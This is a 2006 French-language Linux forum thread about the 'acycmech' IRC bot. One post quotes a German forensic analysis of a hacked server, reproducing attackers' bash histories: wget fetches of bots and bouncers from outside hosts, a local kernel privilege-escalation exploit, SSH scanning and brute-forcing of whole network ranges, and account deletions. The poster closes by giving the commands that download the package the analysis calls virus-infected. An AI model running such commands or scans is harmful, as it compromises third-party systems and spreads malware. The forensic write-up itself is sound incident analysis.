Swisslinux.org

− Le carrefour GNU/Linux en Suisse −

 

Langue

 

Le Forum

Vous n'êtes pas identifié.

#1 31 May 2006 10:47:23

jean@adimp.ch
Illuminé(e)
Lieu: Marly
Date d'inscription: 10 Mar 2005
Messages: 1233
Site web

Acycmech

Salut,
  Est-ce que quelqu'un connaît acycmech?
A+.


--------------------------------------------------------
Jean Tinguely Awais
Ma vie sur twitter : http://www.twitter.com/tservi

Hors ligne

 

#2 01 Jun 2006 07:14:04

BOFH
Admin
Lieu: Ecublens, VD
Date d'inscription: 03 Feb 2005
Messages: 862
Site web

Re: Acycmech

Vraisemblablement une variante d'EnergyMech, un bot irc. Google est plutôt muet sur ce coup-là, hein ?

0wned ? si t'as pu garder les sources je jette volontiers un coup d'oeil dessus.

Hors ligne

 

#3 01 Jun 2006 09:33:30

jean@adimp.ch
Illuminé(e)
Lieu: Marly
Date d'inscription: 10 Mar 2005
Messages: 1233
Site web

Re: Acycmech

Salut,
  Non je ne suis pas "owned".
  Oui google est muet et je l'ai effacé très rapidement.
  Sinon comme le roumain n'est pas ma langue maternelle, j'ai un peu de peine à traduire les sites.

Par contre j'ai trouvé ça en allemand:

Code:

Da die Logfiles bereits rotated und damit die Daten verschollen sind, kann man nur anhand der verwendeten Software und der bash_history der gehackten Accounts auf die Vorgaenge schliessen. Fuer den letzten Angriff existieren noch einige Daten in den Logfiles [http://blaueshaus.dnsalias.org/~guest/gondwana.log] die zeigen, dass dieser (vierte) Angreifer bereits ueber eine Liste der Usernamen verfuegte.

Weiter soll lediglich noch auf den Akt der ultimativen Bosheit [http://www.linuxquestions.org/questions/showthread.php?threadid=347457 Act of ultimate evil crashes kernel] verwiesen werden.

'''21. Apr 21:09'''
Einloggen mit dem User diana. Die bash_history enthaelt folgendes:

<blockquote style="background: lightgrey; border: 1px solid black; height: 240px; overflow:auto;">
<pre>
 (/home/diana/.bash_history)
 w
 ls
 wget basarabi.go.ro/buti.tar.gz
 tar zxvf buti.tar.gz
 rm -rf buti.tar.gz
 cd mech
 ./mech
 cd
 ,s
 ls
 wget basarabi.go.ro/bnc.tar.gz
 tar zxvf bnc.tar.gz
 rm -rf bnc.tar.gz
 cd psy
 ls
 ./psybnc
 ls
 pico psybnc.conf
 ./psybnc
 ps -aux
 ls
 od
 id
 w
 ls
 passwd
 uname -a
 cat /etc/issue
 wget basarabi.go.ro/a
 chmod +x a
 ./a
 passwd
 w
 passwd
 ftp www.gabri3l.go.ro
 tar xzvf psybnc.tar.gz
 cd psybnc
 make

 ./psybnc
 echo "PSYBNC.SYSTEM.PORT1=6667">psybnc.conf;echo "PSYBNC.SYSTEM.HOST1=*">>psybnc.conf;echo "PSYBNC
 .HOSTALLOWS.ENTRY0=*;*">>psybnc.conf
 ./psybnc
 echo "PSYBNC.SYSTEM.PORT1=6668">psybnc.conf;echo "PSYBNC.SYSTEM.HOST1=*">>psybnc.conf;echo "PSYBNC
 .HOSTALLOWS.ENTRY0=*;*">>psybnc.conf
 ./psybnc
 kill -9 21514
 rm -rf psybnc
 rm -rf psybnc.tar.gz
 wget geocities.com/m3thadon2004/psyBNC.tar.gz
 tar xzvf psybnc.tar.gz
 ls
 rm -rf psybnc.conf
 rm -rf psybncchk
 rm -rf
 rm -rf psybnc.tar.gz
 rm -rf psybnc.pid
 ls
 ftp www.gabri3l.go.ro
 w
 ls
 rm -rf psybnc.tar.gz
 rm -rf buti.tar.gz
 cd /tmp
 ls
 cd /var/tmp
 ls 
 cd
 ls
 cd atac2
 ls
 ls
 cd /tmp
 ls
 cd /var/tmp
 ls
 cd atac2
 cd
 ls
 cd mech
 ls
 rm -rf atac2.tar.gz
 cd atac2
 ./start 213.47
 ls
 ./start 82.44
 ./start 220.130
 ls
 rm -rf 220.225.pscan.22
 rm -rf 24.120.pscan.22
 ./start 81.72
 ./start 82.48
 ls
 rm -rf 180.12.pscan.22
 rm -rf 81.64..pscan.22
 rm -rf 81.64.pscan.22
 cdls
 cd
 ls
 w
 wget www.loganel.home.ro/mech.tgz
 tar xzvf mech.tgz
 cd mech
 pico
 pico mech2.usr
 pico mech.set
 pico mech3.usr
 ./mech
 ps -aux
 killall -9 mech
 kill -9 17291
 ps -aux
 pico mech2.set
 pico mech.set
 ls
 ./mech
 rm -rf mech
 rm -rf *
 ls
 ls
 wget www.loganel.home.ro/mech.tgz
 tar xzvf mech.tgz
 cd mech
 ./mech
 ./mech
 rm -rf mech
 exit
</pre>
</blockquote>

* Download eines Paketes (buti.tar.gz)
* Installation von Software in /home/diana/mech/ (mech binary)
* Loeschen des Paketes (buti.tar.gz)
* Starten eines IRC-Servers (mech)
* Download eines Paketes (bnc.tar.gz)
* Installation von Software in /home/diana/psy/ (makesalt, psybnc binaries)
* Loeschen des Paketes (bnc.tar.gz)
* Starten eines IRC-Bouncers (psybnc)
* Aendern der Konfiguration des IRC-Bouncers (psybnc.conf)
* Neustart des IRC-Bouncers (psybnc)
* Aendern des Passworts (diana)
* Download einer Software (a binary)
* Starten eines Kernel Exploits (a) [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1235 CAN-2004-1235] [http://isec.pl/vulnerabilities/isec-0021-uselib.txt  Uselib() Local Privilege Escalation]
* Download eines Paketes (psybnc.tar.gz)
* Installation von Software in /home/diana/psybnc/ (makesalt, psybnc binaries)
* Starten eines IRC-Bouncers (psybnc)
* Aendern der Konfiguration des IRC-Bouncers (psybnc.conf)
* Neustart des IRC-Bouncers (psybnc)
* Aendern der Konfiguration des IRC-Bouncers (psybnc.conf)
* Neustart des IRC-Bouncers (psybnc)
* Download eines Paketes (psyBNC.tar.gz)
* Download eines Paketes (atac2.tar.gz)
* Installation von Software in /home/diana/atac2/ (pscan2, ss, ssh-scan binaries)
* Starten eines SSH-Port-Scanners (pscan2) auf die B-Class Netze 213.47.*.*, 82.44.*.*, 220.130.*.*, 81.72.*.*, 82.48.*.* und Brute Force Attacken (ssh-scan) auf jeden SSH-Daemon.
* Download eines Paketes (mech.tar.gz)
* Installation von Software in /home/diana/mech/ ( binaries)
* Konfigurieren eines mech-Bot Netzes
* Starten eines mech-Bots (mech)
* Aendern der Konfiguration des  mech-Bot Netzes
* Neustart des mech-Bots (mech)
* Loeschen der Software (/home/diana/mech/)
* Download eines Paketes (mech.tar.gz)
* Installation von Software in /home/diana/mech/ ( binaries)
* Loeschen der Software (/home/diana/mech/)
* Ausloggen

'''15. Mai 20:31'''

Einloggen mit dem User eva. Installation von Software in /mnt/scratch_homes/home/eva/root2/. Diese ist mit Unix/RST.B infiziert. Die bash_history enthaelt keine verwertbaren Spuren.

'''22. Mai 15:11'''
Einloggen mit dem User diana. Die bash_history enthaelt folgendes:

<blockquote style="background: lightgrey; border: 1px solid black; height: 240px; overflow:auto;">
<pre>
 (/home/diana/.bash_history)
 ~
 basarabi.go.ro/atac2.tar.gz
 wget basarabi.go.ro/atac2.tar.gz
 tar xzvf atac2.tar.gz
 cd atac2
 mv start atac2
 mv scan start
 ./start 70.185
 ./start 222.152
 ./scan 80.188
 ./start 80.141
 wget www.basarabi.go.ro/buti.tar.gz
 tar xzvf buti.tar.gz
 cd mech
 ./mech
 s
 wget basarabi.go.ro/atac2.tar.gz
 tar xzvf atac2.tar.gz
 cd atac2
 mv scan start
 ./start 220.225
 ./start 82.50
 ./start 85.142

 ./start 83.208
 ./start 24.120
 ./scan 180.12
 ./start 180.12
 ./start 142.3
 ./start 81.64.
 ./start 81.64
 ./start 222.152
 ./start 141.168
 ./start 82.123
 ./start 208.5
 ./start 221.130
 ./scan 220.1
 3./start 220.130
 ./start 220.130
 ./start 222.15
 a
 ls
 ./start 1
 ./start 220.120
</pre>
</blockquote>

* Download eines Paketes (atac2.tar.gz)
* Installation von Software in /home/diana/atac2/ (pscan2, ss, ssh-scan binaries)
* Starten eines SSH-Port-Scanners (pscan2) auf die B-Class Netze 70.185.*.*, 222.152.*.*, 80.141.*.* und Brute Force Attacken (ssh-scan) auf jeden SSH-Daemon.
* Download eines Paketes (buti.tar.gz)
* Installation von Software in /home/diana/mech/ (mech binary)
* Starten eines IRC-Servers (mech)
* Loeschen des Paketes (buti.tar.gz)
* Download eines Paketes (atac2.tar.gz)
* Installation von Software in /home/diana/atac2/ (pscan2, ss, ssh-scan binaries)
* Starten eines SSH-Port-Scanners (pscan2) auf die B-Class Netze 220.225.*.*, 82.50.*.*, 85.142.*.*, 83.208.*.*, 24.120.*.*, 180.12.*.*, 142.3.*.*, 81.64.*.*, 222.152.*.*, 141.168.*.*, 82.123.*.*, 208.5.*.*, 221.130.*.*, 220.130.*.*, 222.15.*.* und Brute Force Attacken (ssh-scan) auf jeden SSH-Daemon.
* Starten eines SSH-Port-Scanners (pscan2) auf das B-Class Netz 220.120.*.* und Brute Force Attacken (ssh-scan) auf jeden SSH-Daemon.

'''May 22 21:20'''

Die bash_history enthaelt folgendes:

<blockquote style="background: lightgrey; border: 1px solid black; height: 240px; overflow:auto;">
<pre>
 (/root/.bash_history)
 w
 ls
 ps -aux
 cat /etc/passwd
 userdel cyrus
 ps -aux
 userdel thymian
 userdel postgres
 userdel dancer
 userdel daemon
 userdel blootbot
 cat /etc/hosts
 /sbin/ifconfig
 ps -aux
 kill -9 27056
 kill -9 450
 uname -a
 cat /proc/cpuinfo
 php -f
 php
 cd
 id
 kill -9 *
 killall -9 *
 ps -aux
 passwd
 cd
 ls
 cd /var/tmp
 ls
 cd /tmp
 ls
 wget kadilack.org/atac2.tgz
 tar zxvf atac2.tgz
 rm -rf atac2.tgz
 cd .a
 ls
 ./scan 85.37
 ls
 rm -rf 85.37.pscan.22
 ./scan 220.130
 ls
 passwd
 passwd
 passwd
 passwd
 w
 ps -aux
 wget geocities.com/m3thadon2004/psyBNC.tar.gz
 tar zxf psyBNC.tar.gz
 cd psybnc
 make
 ./psybnc
 w
 ls
 rm -rf psybnc.tar.gz
 rm -rf psybnc
 wget basarabi.go.ro/atac2.tar.gz
 tar xzvf atac2.tar.gz
 cd atac2
 mv scan start
 ./start 217.59
</pre>
</blockquote>

* Loeschen von Useraccounts (cyrus, thymian, postgres, dancer, daemon, blootbot)
* Toeten aller laufenden Prozesse
* Aendern des Passworts (root)
* Download eines Paketes (atac2.tgz)
* Installation von Software in /tmp/.a/ (atac, pscan2, ssh-scan binaries)
* Loeschen des Paketes (atac2.tgz)
* Starten eines SSH-Port-Scanners (pscan2) auf das B-Class Netz 85.37.*.* und Brute Force Attacken (ssh-scan, atac) auf jeden SSH-Daemon.
* Download eines Paketes (psyBNC.tgz)
* Installation von Software in /tmp/psybnc/ und Compilieren des Sourcecodes (psybnc binary)
* Starten eines IRC-Bouncers (psybnc)
* Loeschen der Software (/tmp/psybnc/)

'''9. Jul 13:02'''

Einloggen mit dem User heidi. Die bash_history enthaelt folgendes:

<blockquote style="background: lightgrey; border: 1px solid black; height: 240px; overflow:auto;">
<pre>
 (/home/heidi/.bash_history)
 uname
 uptime
 passwd
 cd /var/tmp
 ls -a
 /sbin/ifconfig -a |grep inet
 ls -a
 cd /var/tmp
 ls -a
 mkdir ...
 cat /etc/issue
 uname -a
 wget members.lycos.co.uk/cobrabesthacker/emech.tgz
 tar zxvf emech.tgz
 cd emech
 ./lover
 cd /var/tmp
 ls -a
 rm -rf emech.tgz
 wget members.lycos.co.uk/cobrabesthacker/acycmech.tar.tar
 tar zxvf acycmech.tar.tar
 cd acycmech
 ./configure
 l s-a
 cd ..
 rm -rf acycmech
 rm -rf acycmech.tar.tar
 ps aux
 cd /var/tmp
 ls -a
 cd emech
 ls -a
 ./lover
 ps aux
 cd ..
 wget cobrabesthacker.lx.ro
 wget cobrabesthacker.lx.ro/bnclinux.tgz
 tar zxvf bnclinux.tgz
 cd bnc
 ./portmap
 ps aux
 cd ..
 ls -a
 rm -rf bnc
 rm -rf emech
 ls -a
 cd ...
 ls -a
 wget members.lycos.co.uk/cobrabesthacker/scanner.tar.gz
 tar zxvf scanner.tar.gz
 cd scanner
 ./start 216.183
</pre>
</blockquote>

Folgen des Einbruchs:

* Download eines Paketes (emech.tgz) mit Unix/RST.B infiziert
* Installation von Software in /var/tmp/emech/ (linux,freebsd,darwin binaries)
* Starten eines IRC-Servers (lover) incl. Seen-Bot
* Loeschen des Paketes (emech.tgz)
* Download eines Paketes (acycmech.tar.tar) mit Unix/RST.B infiziert
* Installation von Software in /var/tmp/acycmech/ (acycmech, do binaries)
* Konfigurieren eines mech-Bot Netzes
* Loeschen des Paketes (acycmech.tar.tar) und der Software (/var/tmp/acycmech/)
* Neustart des IRC-Servers (lover) incl. Seen-Bot
* Download eines Paketes (bnclinux.tgz)
* Installation von Software in /var/tmp/bnc/ (makesalt, portmap binaries)
* Starten eines Bruteforce (portmap) ?
* Loeschen der Software (/var/tmp/bnc/, /var/tmp/emech/)
* Download eines Paketes (scanner.tar.gz) mit Unix/RST.B infiziert
* Installation von Software in /var/tmp/.../scanner/ (brute, scan binaries)
* Starten eines SSH-Port-Scanners (scan) auf das B-Class Netz 216.183.*.* und Brute Force Attacke (brute) auf jeden SSH-Daemon.

Tu peux récupérer les sources et ça fonctionne :

Code:

wget members.lycos.co.uk/cobrabesthacker/acycmech.tar.tar
tar zxvf acycmech.tar.tar

A+.


--------------------------------------------------------
Jean Tinguely Awais
Ma vie sur twitter : http://www.twitter.com/tservi

Hors ligne

 

Pied de page des forums

Powered by FluxBB